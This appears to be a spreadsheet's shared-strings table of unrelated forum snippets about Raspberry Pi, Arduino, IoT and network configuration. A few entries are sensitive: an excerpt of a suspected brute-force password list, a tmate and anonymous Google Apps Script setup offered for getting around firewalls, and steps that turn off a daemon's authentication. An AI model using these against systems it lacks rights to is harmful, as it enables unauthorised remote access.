    <t>Also, from my experience with the Teensy, you might need to add a udev rule to allow permissions to access the port from non-root user.</t>
  </si>
  <si>
    <t>There is no way to 'check' an uninitialised variable and thereby to inoculate yourself against UB.</t>
  </si>
  <si>
    <t>I couldn't figure out which TLS Version the WiFiClientSecure is using or how defne it.</t>
  </si>
  <si>
    <t>Now run echo $USER to see if who is logged in user.</t>
  </si>
  <si>
    <t>Hi I was trying to shut down raspberry pi via arduino and made a python daemon that shutdowns the raspberry pi.</t>
  </si>
  <si>
    <t>Thanks
Plus I can't login to the Cayenne forum for some reason...</t>
  </si>
  <si>
    <t>You need to make a webserver with Arduino Ethernet or Wifi shield.</t>
  </si>
  <si>
    <t>Enabling notification can be done by writing to Client Characteristic Configuration Descriptors (CCC) of GATT server.</t>
  </si>
  <si>
    <t>/etc/dphys-swapfile
make it 2048 from 100.</t>
  </si>
  <si>
    <t>It's most common application is the WEP security algorithm.</t>
  </si>
  <si>
    <t>Trace32 is an In-Circuit Debugger (ICD) made by Lauterbach.</t>
  </si>
  <si>
    <t>I am trying to make an Arduino rfid door lock, with arduino uno, stepper motor, funduino rfid-rc522.</t>
  </si>
  <si>
    <t>Looks like a list of random words, maybe passwords for a brute-force attack:
first file: (excerpt)
second file: (excerpt)
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...</t>
  </si>
  <si>
    <t>User/Device Authorization</t>
  </si>
  <si>
    <t>So, doing this thing helped me to connect my robot to my smartphone via Bluetooth but, when I was connection then the Servo Motor was regularly spinning (again, I don't know why) after secure connection, when I turned that switch on, then my robot took only my first order (which is usually moving forward) and it performed on my first order for almost first 3 to 5 seconds and then the Robot got his system hanged and my smartphone was automatically disconnected from the robot.</t>
  </si>
  <si>
    <t>I am working on a google-glass project, where i have to install/update an app programmatically, in my Research i have following complication:
 Getting System Dialog actions, to perform click programmatically  
In order to install programmatically, the intent leads to System Dialog for user permission, but its not possible to stimulate the action of System Dialog programmatically.</t>
  </si>
  <si>
    <t>First, you must route your traffic to the laptop on the RPi (if not done), using route with something like:
Second, you must configure your firewall to forward that traffic on your laptop to the appropriate interface using iptables (there are many tutos/howtos...)</t>
  </si>
  <si>
    <t>It is used for many purposes, including:
security: sandboxing DOM mutation
performance: minimization of repaints and reflows
testing: performing static analysis on the rendered tree
References
Not Your Average Virtual DOM
Virtual DOM Benchmark
Virtual-DOM: A Virtual DOM and Diffing Algorithm
The one thing that no one properly explains about React - Why Virtual DOM
Inside FastBoot: Faking the DOM in Node
The DOM is not slow, your abstraction is
ReactJS Internals: Virtual DOM
The Real Benefits of the Virtual DOM in React.js
Virtual DOM Coverage: Drive an Effective Testing for
Dynamic Web Applications (pdf)
Dangers of react and VirtualDOM
Reactive MVC and the Virtual DOM
What Developers Need to Know about MVI (Model-View-Intent) - The New Stack
JavaScript in JavaScript (js.js): Sandboxing third-party scripts</t>
  </si>
  <si>
    <t>After doing this All Routers and Coordinator have new PAN Id but now coordinator is not able to discover routers, but routers can discover Coordinator.</t>
  </si>
  <si>
    <t>Notes:
Router cannot ping to the Galaxy S8
Raspberry Pi pings fine with every other device (Laptop, TV, other Pis)
Firewall is disabled
Galaxy S8's wifi is set to always on</t>
  </si>
  <si>
    <t>I know the code works perfectly fine because I copied it over to a regular Win32 application (the allow through firewall came up, i accepted) and it worked perfectly fine.</t>
  </si>
  <si>
    <t>I have realized that with great (moderator) power come great (moderator) responsibility and I will protect this community with my (moderator) powers.</t>
  </si>
  <si>
    <t>I followed this article to install on my windows machine: 
http://linuxbsdos.com/2015/07/30/how-to-install-openssh-on-windows-10/
Sometime in the future based on the announcement by Microsoft at http://blogs.msdn.com/b/powershell/archive/2015/06/03/looking-forward-microsoft-support-for-secure-shell-ssh.aspx it appears Windows will have SSH server.</t>
  </si>
  <si>
    <t>in the documentation given on github they have mentioned some environment variables which can be set for this purpose as follows: 
There are a couple of environment variables which can be used to control the application:
    _HUB_CS:  sets the IoTHub owner connectionstring
    _GW_LOGP: sets the filename of the log file to use
    _TPC_SP:  sets the path to store certificates of trusted stations
    _GW_PNFP: sets the filename of the publishing configuration file
i want to know where to set them in a code, on azure portal where they provide an option for setting env variables, from command line, or in  dockerfile.</t>
  </si>
  <si>
    <t>ok so i have the same problem as this guy, im trying to deploy an UWP app with VS2017 15.5.4 to Raspberry pi 3 using my PC but getting this error:
My Debug Configuration
My Target Build is 16299 and Min 15063
My PC running Windows 10 Pro 16299
My Raspberry Pi build 16299.192, connected to a LAN switch, im able to open device portal, ping showing no problem
Tried turning off windows firewall and defender
Checked Enable Windows IoT Remote Server on portal
Tried Start/Stopping vs remote debugger manually with/without default account on portal
Tried changing target remote machine address box to 192.168.1.10, 192.168.1.10:8116, minwinpc, MINWINPC
Tried 3 times reinstalling VS, first 2 using cmd line, the last is using vs installer
I tried restarting my pc and pi several times
tried changing Universal auth to Windows and None, no luck
tried 2 times reinstalling windows IoT and updating it on pi
HOWEVER, my laptop can deploy easily to my pi without error....
ps.</t>
  </si>
  <si>
    <t>Action: Allow or deny
By default for any port, NSG allows all traffic from Virtual network to Virtual Network, allows all traffic from AzureLoadBalancer to any host and  denies all traffic from any other source to any host.</t>
  </si>
  <si>
    <t>You can certainly use phpMyAdmin installed on your Windows machine instead, but then need to ensure that the MySQL daemon is listening for network connections and that you have a user permitted to connect from an external network connection (I'm seeing that many packages are restricting both of these, as a security precaution, in their distributions now).</t>
  </si>
  <si>
    <t>In addition to standard chatroom features such as room topics and invitations, the protocol defines a strong room control model, including the ability to kick and ban users, to name room moderators and administrators, to require membership or passwords in order to join the room, etc.</t>
  </si>
  <si>
    <t>I have already set up ssh with my raspberry pi 3 and my laptop, but now I want to open a file from the raspberry pi onto atom on my windows 10 laptop, and when I save the file in atom on my Windows 10 laptop, I want it to save to and update the file on the raspberry pi.</t>
  </si>
  <si>
    <t>Example - you can define a job that instructs a set of devices to download and install application or firmware updates, reboot, rotate certificates, or perform remote troubleshooting operations.</t>
  </si>
  <si>
    <t>Desactived the AUTH:
nano /etc/transmission-daemon/settings.json
edit this line: 
rpc-authentication-required: false
Restart the process:
/etc/init.d/transmission-daemon restart/start
Execute this:
transmission-remote -l 
If it work, none message will be shown.</t>
  </si>
  <si>
    <t>In addition to standard chatroom features such as room topics and invitations, the protocol defines a strong room control model, including the ability to kick and ban users, to name room moderators and administrators, to require membership or passwords in order to join the room.</t>
  </si>
  <si>
    <t>Example -  you can define a job that instructs a set of devices to download and install application or firmware updates, reboot, rotate certificates, or perform remote troubleshooting operations.</t>
  </si>
  <si>
    <t>Note If you're encountering issues with verifying the server certificate, you need to download the Google root certificate by calling:
wget https://pki.google.com/roots.pem
Update You may also want to try to set the Python version in your virtual environment to Python 2 by setting up the virtual environment as:
virtualenv env --python=python2</t>
  </si>
  <si>
    <t>If enabled, a router will verify a coordinator exists on the same channel after joining or power cycling to ensure it is operating on a valid channel, and will leave if a coordinator cannot be found (if NJ=0xFF).</t>
  </si>
  <si>
    <t>ASP.NET MVC supports the following types of filters:
Authentication filters
Authorization filters
Action filters
Result filters
Exception filters</t>
  </si>
  <si>
    <t>ASP.NET MVC supports the following types of action filters:
Authorization filters
Action filters
Result filters
Exception filters</t>
  </si>
  <si>
    <t>Access to phpMyAdmin doesn't tell you anything, either, because with it, you're not talking to the database server remotely -- you're talking to your web server remotely, and your web server is running code that talks to the database locally from within the same machine, and often uses a different mechanism of server access that is not TCP/IP.</t>
  </si>
  <si>
    <t>Instead of using the traditional anchor tags like this:
Angular Routing uses "routerLink" to navigate between views:
Questions using this tag could be about:
Troubleshooting routing problems
How to use the "routerLinkActive" tag to control properties
Wildcard and error routing
Redirecting views
Route Guards, including Authentication &amp; Authorization
Child Routes
How to configure the App Routing Module (and if you need one)
Asynchronous Routing
Routing is covered in great detail and with many examples in the Angular Guide:
https://angular.io/guide/router</t>
  </si>
  <si>
    <t>This can be easily verified using:
curl -v --user-agent "Windows-Media-Player/10.00.00.1111" -H "Icy-Metadata: 1" -H "Accept: audio/mpeg,audio/aacp" http://66.85.88.242:8136/ &gt;/dev/null
vs.
curl -v --user-agent "Windows-Media-Player/10.00.00.1111" -H "Icy-Metadata: 1" -H "Accept: audio/mpeg,audio/aacp" http://66.85.88.242:8136/1139_128 &gt;/dev/null
Not sure how it is for ESP8266, but at least for the ESP32, libcurl builds perfectly fine and would be my preferred option for handling HTTP requests instead of error prone hand crafting.</t>
  </si>
  <si>
    <t>In normal, no need to copy files like msvsmon.exe etc manually to the remote device and no need to configure the firewall rules for remote debugger.</t>
  </si>
  <si>
    <t>I've also checked the firewall settings on my dev PC to ensure that it is not blocking traffic (I am connecting over the Private network)
Although the error message warns about Windows Authentication Mode, I can find no such setting for the remote debugger.</t>
  </si>
  <si>
    <t>It is most commonly used by recent versions of Windows Update, Microsoft Update, Windows Server Update Services, and Systems Management Server to deliver software updates to clients, Microsoft's anti-virus scanner Microsoft Security Essentials to fetch signature updates, and is also used by Microsoft's instant messaging products to transfer files.</t>
  </si>
  <si>
    <t>While bridging between AWS IOT endpoint and local MQTT broker, we have to consider the below points :
Make sure the AWS IOT endpoint is configured properly in an order, first create a "thing" , create "certificates" for the thing, download rootCA file, private key and cert.pem file to the machine where the bridge is being configured.Create a policy.</t>
  </si>
  <si>
    <t>See here for what sounds like the same issue:
http://powershell.com/cs/blogs/tips/archive/2009/11/23/configuring-wsman-remotely-for-multiple-computers.aspx
(from this page)
"You should make sure to run PowerShell with full administrative privileges and run Set-WSManQuickConfig beforehand if you cannot run the commands at all because of an access denied-error."</t>
  </si>
  <si>
    <t>The driver modules requires the installation of new python modules:
      # pip install pyserial
      # pip install pyusb==1.0.0b1
      # pip install qrcode
Access Rights
The drivers need raw access to the printer and barcode scanner
  devices.</t>
  </si>
  <si>
    <t>Virtual machines in Hyper-V will always have an Ethernet adapter, not a WiFi adapter, so while you can share the WiFi connection from your host PC to the virtual machine, it will appear in the virtual machine as Ethernet.</t>
  </si>
  <si>
    <t>netsh is the command name for the NetShell utility, which is used as a scripting interface for monitoring and configuring  network interfaces, firewall, routing and remote access under Microsoft Windows.</t>
  </si>
  <si>
    <t>Endpoint as different (for example login.microsoftonline.us)
Developer tools might require extra configuration in order to connect to Azure Government (for example PowerShell).</t>
  </si>
  <si>
    <t>If you now want to set a static IP address for eth0, edit /etc/dhcpcd.conf and put in:
interface eth0
static ip_address=192.168.1.100/24
static routers=192.168.1.1 # or whatever your router is
static domain_name_servers=192.168.1.1 # same as router
After saving the file and sudo reboot, your Raspi should reboot with a static eth0 and a dynamic wlan0 and without the extra IP address hanging around.</t>
  </si>
  <si>
    <t>if you are after a truely decentralised network you would be better off using either a different protocol (one that has no need for a coordinator) or by defining your own using basic RF modems (which is a lot more complicated)
however XBee modules are configurable by AT commands, with a bit of work you could probably set them up to periodically change mode (when it is running as coordinator) to check for other coordinators and if it finds one then stay as a standard node, and if the coordinator drops out (stops replying) then steps up to be coordinator.</t>
  </si>
  <si>
    <t>if you had not set any password initially while installing Windows IoT to your flash SD card, it would remain as the defaults, i.e., 
If you had entered any password initially while installing Windows IoT using the Windows IoT dashboard utility, then the password would change to that,
Username: Administrator
Password: xxxx_your_set_password_xxxx</t>
  </si>
  <si>
    <t>As Martin &amp; Belekz mentioned,you can check the configuration of target device and firewall setting.And more,I want to add that,please note the configuration of Authentication Mode.You should set it as "Universal(Unencrypted Protocol)".Use the mode whenever you are deploying to a remote device.</t>
  </si>
  <si>
    <t>You will also need to configure the firewall on your router so that it allows inbound connections to a PORT that you choose (on the outside) and map that to the internal IP address of the Pi and the port configured on Mosquitto for handling MQTT traffic.</t>
  </si>
  <si>
    <t>Set the addresses to
Setting up your laptop
First, make sure you have networkmanager (with GUI) installed on your laptop.</t>
  </si>
  <si>
    <t>Deep Freeze, by faronics, is an application available for the Microsoft Windows, Mac OS X, and SUSE Linux operating systems which allows system administrators to protect the core operating system and configuration files on a workstation or server by restoring a computer back to its original configuration each time the computer restarts.</t>
  </si>
  <si>
    <t>Before your code to perform those actions executes, though, the file coordinator lets registered file presenter objects perform any tasks that they might require to ensure their own integrity.</t>
  </si>
  <si>
    <t>PS: Some of my window machine not able to read the csv file using the same command, i suspect due to firewall setting in window or router.</t>
  </si>
  <si>
    <t>When I try to connect to my server from my local machine using SSH Client PuTTY / Plink it says Access denied Access Denied Access denied Access denied FATAL ERROR: Server sent disconnect message type 2 "Too many authentification failures for git".</t>
  </si>
  <si>
    <t>Assuming, you don't have (and don't need IP filtering), here are the steps to check in order :
ensure you can ping both networks from your Raspberry Pi
ensure you have ip forwarding activated on the Pi ( should return 1, issue echo 1 &gt; /proc/sys/net/ipv4/ip_forward if not).</t>
  </si>
  <si>
    <t>Ensure that the remote debugger is running in 'Windows Authentication' mode.</t>
  </si>
  <si>
    <t>I have pip installed for 2.7, 3.0, and 3.6 installed, so when I go and do something like:
I get this error:
pi@raspberrypi:~ $ sudo pip3.6 install RPi.GPIO
  pip is configured with locations that require TLS/SSL, however the ssl module in Python is not available.</t>
  </si>
  <si>
    <t>The ping utility uses the icmp network protocol, which is often filtered by firewalls, so its usefulness is usually limited in corporate environments.</t>
  </si>
  <si>
    <t>User Account Control (UAC) is a technology and security infrastructure introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems, with a more relaxed version also present in Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012 and Windows 10.</t>
  </si>
  <si>
    <t>VPS stands for Virtual Private Server and usually refers to a single instance of a virtual machine leased for private running on a shared physical machine.</t>
  </si>
  <si>
    <t>It is a commonly used way for malware distributors to wrap "silent installers" with their malware into regular installations, so that the user thinks he/she is installing a regular program, without knowing that "behind the screens", there's much more being installed.</t>
  </si>
  <si>
    <t>I had read somewhere that I could buy a router (and even though there was no internet connected to it) I could run ethernet from the router to my laptop and another from the router to the raspberry pi and ssh into the pi from my laptop.</t>
  </si>
  <si>
    <t>Ever since i set up the subdomain to go to my pi and set up the port forwarding and firewall exceptions on my router, I never really used the pi itself, I always SSH into it.</t>
  </si>
  <si>
    <t>I have enabled NAT setting 
Then I try to specify a NAT rule for all the traffic that must go through eth1
cannot ping anymore public IPs
route looks like this:
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         hi.link         0.0.0.0         UG    247    0        0 eth1
10.0.0.0        *               255.255.255.0   U     202    0        0 eth0
192.168.8.0     *               255.255.255.0   U     247    0        0 eth1
what am I doing wrong?</t>
  </si>
  <si>
    <t>UPDATE
As Rita Han suggested in further conversation, I enabled 8116 in both firewall of the raspberry and firewall of the PC, I get Ok. terminal answer, but I still have no replay when search 8116 port listening process:
telnet from PC
Power Shell net stat on Raspberry Pi 3
Running Processes in Windows Device Portal
UPDATE
As I wrote before: I opened port on Raspberry Pi 3, restarted device, and here is screenshot proofing, that there is nothing listening for 8116:
UPDATE
To start process manually also don't helps
UPDATE
As Rita asks, I share .csproj and .csproj.user files.</t>
  </si>
  <si>
    <t>BTrace Restrictions
To guarantee that the tracing actions are "read-only" (i.e., the trace actions don't change the state of the program traced) and bounded (i.e., trace actions terminate in bounded time), a BTrace program is allowed to do only a restricted set of actions.</t>
  </si>
  <si>
    <t>However, there's a problem when trying to install the dependency "cryptography":
(these logs gotten from trying to install cryptography on its own, but the same error is gotten when installing flask-ask)
I've tried  to upgrade it, but that doesn't work:
pi@raspberrypi:~ $ pip3 install -U setuptools
Downloading/unpacking setuptools from https://files.pythonhosted.org/packages/7f/e1/820d941153923aac1d49d7fc37e17b6e73bfbd2904959fffbad77900cf92/setuptools-39.2.0-py2.py3-none-any.whl#sha256=8fca9275c89964f13da985c3656cb00ba029d7f3916b37990927ffdf264e7926
  Downloading setuptools-39.2.0-py2.py3-none-any.whl (567kB): 567kB downloaded
Installing collected packages: setuptools
  Found existing installation: setuptools 5.5.1
    Not uninstalling setuptools at /usr/lib/python3/dist-packages, owned by OS
  Can't roll back setuptools; was not uninstalled
Cleaning up...</t>
  </si>
  <si>
    <t>Storage on IDE/SCSI/USB disks, FibreChannel, LVM, iSCSI, NFS and filesystems 
libvirt provides:
Remote management using TLS encryption and x509 certificates
Remote management authenticating with Kerberos and SASL
Local access control using PolicyKit
Zero-conf discovery using Avahi multicast-DNS
Management of virtual machines, virtual networks and storage
Portable client API for Linux, Solaris and Windows
More infos:
libvirt homepage
libvirt at wikipedia</t>
  </si>
  <si>
    <t xml:space="preserve">
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t>
  </si>
  <si>
    <t>"unicodedata": unicodedata module, required for u'\N{ATOM SYMBOL}' syntax
CPython restricted mode
WARNING: CPython restricted mode is unsafe because it is possible to execute
arbitrary bytecode.</t>
  </si>
  <si>
    <t>You can expose specific devices to your container using the  option to docker run, as in:
You can remove all restrictions with the --privileged flag:
docker run --privileged myimage
This will expose all of /dev to your container, and remove other restrictions as well (e.g., you will be able to change the network configuration in the container and mount new filesystems).</t>
  </si>
  <si>
    <t>The program does not require Firefox to be installed on the computer, nor does it leave personal information on the computer or interfere with any installed versions of Firefox, though installation on a hard drive is possible.</t>
  </si>
  <si>
    <t>It needs to be configured using up and down scripts 
Make sure you are allowing traffic (clients of local VPN Server) on VPN interface to be forwarded in your firewall rules
Before setting up the OpenVPN server, make sure
The remove VPN server is pushing the default gateway to your VPN
client 
You have setup the firewall correctly
You are able to reach the cloud through the Remote VPN Server.</t>
  </si>
  <si>
    <t>I want to route my that traffic in following way:
Phone --&gt; Router --&gt; Raspberry Pi --&gt; Router --&gt; Mac
I tried setting up the proxy in my router but somehow it doesn't work.</t>
  </si>
  <si>
    <t>Configure WLAN
To configure WLAN we have to edit /etc/wpa_supplicant/wpa_supplicant.conf and add a network configuration to it.</t>
  </si>
  <si>
    <t>That will avoid the necessity of setting up a client on the PI, and opening the firewall at port 5432, configuring pg_hba.conf, etc.</t>
  </si>
  <si>
    <t>Use this tag only when referring to the firewall that comes with Windows; Other firewalls that run on Windows should contain the two tags [windows] [firewall] instead.</t>
  </si>
  <si>
    <t>Using the Picker is an alternative to integration with the Drive UI, for applications that use the limited permission  OAuth scope and need to access explicitly-selected, existing files in users' Google Drive.</t>
  </si>
  <si>
    <t>Installation
Once you've verified that Ruby is installed:
gem install t
Configuration
Twitter API v1.1 requires OAuth for all of its functionality, so you'll need a
registered Twitter application.</t>
  </si>
  <si>
    <t>Use this tag only when referring to the firewall that comes with Windows; Other firewalls that run on Windows should contain the two tags windows firewall instead.</t>
  </si>
  <si>
    <t>It must be the mini laptop, so I give some specs:
Just installed clean copy of Win 7 Ultimate with no firewall, antivirus or anything.</t>
  </si>
  <si>
    <t>I'd suggest looking at https://serverfault.com/questions/641483/how-to-grant-user-modify-only-specific-protected-file-by-sudo (or more specifically, there should be a way to use extended permissions to grant access to a user to the 3 sys files you care about in a way that doesn't require root.</t>
  </si>
  <si>
    <t>virtualenv allows you to create a sandboxed and isolated environment where Python packages can be installed without interfering with other packages on the same machine.</t>
  </si>
  <si>
    <t>This will seem just like any other update to your customer who already has the application installed, because it does not show the trust dialog when installing an update.</t>
  </si>
  <si>
    <t>If you setup firewall rules to allow outbound traffic to the Windows IoT Core device you may be able to deploy updates remotely.</t>
  </si>
  <si>
    <t>While some beacons (like Radius Networks' RadBeacon USB) allow you to set the power-on configurability timeout to be forever, this device does not have a publicly available SDK to configure over bluetooth.</t>
  </si>
  <si>
    <t>Copy the new pipsta/Examples/system_scripts/ to /etc/udev/rules.d/60-ablesystems-pyusb.rules
Restart the Raspberry Pi
If the printer still fails to be discovered then -
The following workaround may work.</t>
  </si>
  <si>
    <t>And start the remote debugger via device portal is not working because it runs remote debugger under administrator account.</t>
  </si>
  <si>
    <t>They regulate immediate access to a device by requiring that the user perform a certain action in order to receive access: such as entering a password, using a certain button combination, or by performing a certain gesture using a device's touchscreen.</t>
  </si>
  <si>
    <t>working browser client setup
//    .configure(auth({ storage: window.localStorage }))
not working nodejs client setup
const feathers = require('feathers/client');
const socketio = require('feathers-socketio/client');
const hooks = require('feathers-hooks');
// const errors = require('feathers-errors'); // An object with all of the custom error types.</t>
  </si>
  <si>
    <t>Once that is done, open a command prompt and run the following command:
This command performs configuration actions to enable this machine for remote management, which includes:
Starts the WinRM service 
Set the WinRM service type to auto start
Create a listener to accept requests on any IP address Enable
firewall exception for WS-Management traffic (for http only)</t>
  </si>
  <si>
    <t>When connecting to a server behind a NAT firewall/router, in addition to port forwarding, the client should be directed to the IP address of the router.</t>
  </si>
  <si>
    <t>The virtual machine has no network interfaces, and you control physical access to it, therefore security updates are not critical.</t>
  </si>
  <si>
    <t>MongoDB provides features that allow administrators to implement controls to ensure that users and applications have access to only the data that they require controls and restrictions for any MongoDB deployment.</t>
  </si>
  <si>
    <t>If the service is part of a Virtual Network, configuration information for the network must be provided in the service configuration file, as well as in the virtual networking configuration file.</t>
  </si>
  <si>
    <t>Windows Installer deployment requires administrative permissions and allows only limited user installation; ClickOnce deployment enables non-administrative users to install and grants only those Code Access Security permissions necessary for the application.</t>
  </si>
  <si>
    <t>The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet.</t>
  </si>
  <si>
    <t>The Cookie Law is a piece of European privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet.</t>
  </si>
  <si>
    <t>[2] True, I could use ssh or similar; however, what intrigues me is that a bot would work independently of the operating system of the machine that performs the request, be it Linux, Windows, Android or anything, without installing additional software (without even installing Telegram, since there exists Telegram web).</t>
  </si>
  <si>
    <t>Administrators can also remotely wipe (that is, restore factory defaults on) lost or stolen handsets.</t>
  </si>
  <si>
    <t>Even the sample code says
// Windows itself will pop the confirmation dialog as part of "consent" if this is running on Desktop or Mobile
// If this is an App for 'Windows IoT Core' where there is no Windows Consent UX, you may want to provide your own confirmation.</t>
  </si>
  <si>
    <t>A RIA deployed in a browser does not require installation, for example, while one deployed with AIR requires the application be packaged, digitally signed, and installed on the user's local file system.</t>
  </si>
  <si>
    <t>The Cookie Policy is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet</t>
  </si>
  <si>
    <t>Lots of actions within BigTable require acquisition of locks including opening tablets for writing, ensuring that there is no more than one active Master at a time, and access control checking.</t>
  </si>
  <si>
    <t>I am generating an SSH Connection via Renci.SshNet and codes like those do work perfectly fine:
But it is impossible for me to pass the Set-Date command: 
There is a guide "How to connect via Shell Commands" and the command 
Set-Date "08.06.2016 14:31:00" works perfectly fine, but the same Code doesn't pass anything in the program...
Im am glad for any help!</t>
  </si>
  <si>
    <t>Easiest way to get your new endpoint if you're worried about adding  to wrong place in url: 
Login to AWS account
Go to IoT service page
Select Settings from sidebar
Copy-paste new endpoint
It only displays updated AST endpoint, so there's no way for you to copy wrong link.</t>
  </si>
  <si>
    <t>Things I usually do to gain access to my board AFTER wifi is lost: 
Hard reset the board (unplug power and plug it again) -&gt; almost always works
Try to access arduino from several different wifi devices hoping that the board somehow "wakes up" -&gt; occasionally works but only after 4 or 5 minutes (sometimes hours) of failed attempts
My router seems to be fine.</t>
  </si>
  <si>
    <t>Another method you can use during development is to install directly over ADB with the -g flag:
This will grant the dangerous permissions at install-time.</t>
  </si>
  <si>
    <t>It makes sense to me that any web traffic once connected to my AP would just be sent to my --to-destination 192.168.1.96.8001
The other method I have tried is to set the address with DNSMasq using
sudo nano /etc/dnsmasq.conf
I am uncertain if the systemd does any network configuration or iptables at a different time so the AP captive portal is lost.</t>
  </si>
  <si>
    <t>I have my client_secret.json file properties in my .sln Build Action = Content and Copy to Output Directory = Copy Always
The code I have that works on my dev machines:
Any help or insight as to how I can get this running on my rp2 would be GREATLY appreciated!</t>
  </si>
  <si>
    <t>Take a look at the network configuration of your laptop and check the gateway setting, use the same for the Raspberry PI and make sure you can ping the gateway form the Raspberry PI.</t>
  </si>
  <si>
    <t>Unplugging the power would not be a graceful shutdown, and I doubt that you could depend on the reliability of any event for figuring out if it shut down.</t>
  </si>
  <si>
    <t>The application works great when running on a Windows 10 client, but when running on a Raspberry Pi 3 running Windows IoT 10, the web service returns a 401 - User Not Authenticated.</t>
  </si>
  <si>
    <t>One thing that I think it could help is when deploying the app to the Remote Machine and you are presented the Remote Connections dialog you can choose there what type of authentication you want.</t>
  </si>
  <si>
    <t>VPS stands for Virtual Private Server and usually refers to a one instance of a virtual operating system leased for private use on a shared physical machine.</t>
  </si>
  <si>
    <t>Because there is no connectivity out of the box (as you said), you can enable tethering via USB on the smartphone, and by connecting the smartphone to the Raspberry PI using the USB cable (and installing the required drivers) they will have internet connectivity to eachother, and the app will be able to communicate directly to the webserver / API on the Raspberry PI.</t>
  </si>
  <si>
    <t>We would like to use MQTT over WebSocket on port 443 so we used this constructor:
And to grab the credentials we are using:
Our lambda function has been given external access and has an IAM role granted to it for testing with all permissions:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
Now what is interesting is that when we test this locally it works great.</t>
  </si>
  <si>
    <t>This solution is no possible link
 Using EMM Solution (WSO2 IOT)
 I used WSO2-IOT, but since there is no device policy manager available for google-glass, so even installing the agent apk wont help, as i can not avail any service provided by the EMM (WSO2 IOT), (to install or update my app) 
Getting System Privileges without Root
In order to use the following permissions:
&lt;uses-permission android:name="android.permission.INSTALL_PACKAGES"/&gt;&lt;uses-permission android:name="android.permission.DELETE_PACKAGES"/&gt;
My app would require System Privileges, to silently install/delete/update the app.</t>
  </si>
  <si>
    <t>I enjoy moderator duties - shutting down voting rings, keeping spam under control, actioning flags, etc.</t>
  </si>
  <si>
    <t>I now suspect that there is a problem with how the device is detected by the operating system, since not only the productID changes between Windows and Linux, but also wMaxPacketSize for the endpoints I'm interested in is given as 64 bytes on Windows and 512 bytes on Linux.</t>
  </si>
  <si>
    <t>The Allow and Deny directives are used to specify which clients are or are not allowed access to the server, while the Order directive sets the default access state, and configures how the Allow and Deny directives interact with each other.</t>
  </si>
  <si>
    <t>Here are some of the things that I've done but didn't manage to work still
Reinstalled google-cloud-texttospeech
Making credentials permanent
Ensure that my environment variables are set by using env &amp; set | grep GOOGLE_APPLICATION_CREDENTIALS on the terminal to check
Restarted my raspberry pi</t>
  </si>
  <si>
    <t>On Linux, make sure you install your CA Certificate generated from the link you pasted:
You can install by running this: 
- sudo cp $CERTDIR/certs/azure-iot-test-only.root.ca.cert.pem  /usr/local/share/ca-- 
- certificates/azure-iot-test-only.root.ca.cert.pem.crt
- sudo update-ca-certificates
From your logs, it looks like you are having problems with the certificate.</t>
  </si>
  <si>
    <t>A type of user account on an operating system which will typically allow all functions to be performed to a computer, including (but not limited to) the creation and restriction of user accounts, installing software or drivers, or changing operating system options.</t>
  </si>
  <si>
    <t>Just be sure to configure them with different 802.15.4 channels to avoid interference.</t>
  </si>
  <si>
    <t>My Arduino Micro Atmega32u4 was working fine until I got fed up of apple reminding me to update, under those updates there was a security setting that I believe is the cause behind of all this.</t>
  </si>
  <si>
    <t>I'm trying to configure my router (Iskratel F50 or Mikrotik hAP lite) to control WiFi traffic with 802.1x and some kind of RADIUS server.</t>
  </si>
  <si>
    <t>Now I want to access it remotely, but I dont want to do port forwarding or touching the router configuration.</t>
  </si>
  <si>
    <t>The routers won't join another XBee network, and the coordinators won't let any devices without the correct key join.</t>
  </si>
  <si>
    <t>Or to get out from behind restrictive firewall that filters some ports in outgoing traffic.</t>
  </si>
  <si>
    <t>I went through the accepted answer there, updated ca-certificates on the device, manually installed the root certificates, and made sure git was using them, but the error persisted.</t>
  </si>
  <si>
    <t>X11 forwarding means tunneling traffic of X server and X client through a secure channel to avoid anyone from intercepting the traffic.</t>
  </si>
  <si>
    <t>Before anyone asks:
-I ran the installer as administrator
-The device drivers are installed (At least they were ticked in the installer programm)
-I have this issue on a second computer (Windows 7 with Arduino IDE 1.8.5), too
Does anyone have a solution for this issue?</t>
  </si>
  <si>
    <t>Read at the installation guide for MPICH
You would answer my question by telling me if it is possible to somehow install a Linux library on my Windows PC to use in Visual Studio to remotely debug against Raspberry PI.</t>
  </si>
  <si>
    <t>You could try blocking ping on the remote host temporarily to see if it has any effect:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
It should no longer be possible to ping the remote host.</t>
  </si>
  <si>
    <t>Regarding your question 3, the sleeping end device's parent (either a router or the coordinator) keeps a table of its child devices, and is responsible for answering on their behalf when another device on the network is performing node discovery.</t>
  </si>
  <si>
    <t>Retrieve "operational" or "run-state" or "configuration" information as Tables/Views
Make configuration changes in unstructured and structured ways
Provide common utilities for tasks such as secure copy of files and software updates
readthedocs: http://junos-pyez.readthedocs.io/en/latest/index.html
github: https://github.com/Juniper/py-junos-eznc
videos: https://www.youtube.com/results?search_query=PyEZ</t>
  </si>
  <si>
    <t>If you just want to get around firewalls with ssh try tmate
Below are instructions how to use it for a remote setup
Needed:
tmate
a google account 
`    
Have the above code on the raspberry pi with the users cron job set with 
Login to google and go to http://script.google.com/ when there input this code
`
function doGet(e) {
  var id = e.parameter.id;
  var ssh = e.parameter.ssh;
  var ss = SpreadsheetApp.openByUrl("{{ url of google spread sheet to dump data to }}").getActiveSheet();
  var lr = ss.getLastRow();
  var data = ss.getRange(1,1,lr,1).getValues();
  data = data.join("`").split("`");
  var loc = data.indexOf(id);
  if(loc != -1){
    ss.getRange(loc+1,2).setValue(ssh);
  }else{
    ss.appendRow([id,ssh]);
  }
}
Now on the google script under publish hit deploy as web app allow even anonymous and now you have your google script url.</t>
  </si>
  <si>
    <t>If you don't have lsof already you can download and install it by becoming root and running:
To discover the process name, ID (pid), and other details you need to run:
So to see which process is listening upon port 24 we can run:
root@machine:~# lsof -i :24
After this you should be able to move on towards a solution.</t>
  </si>
  <si>
    <t>This is what I get in the serial:
This is in the error log:
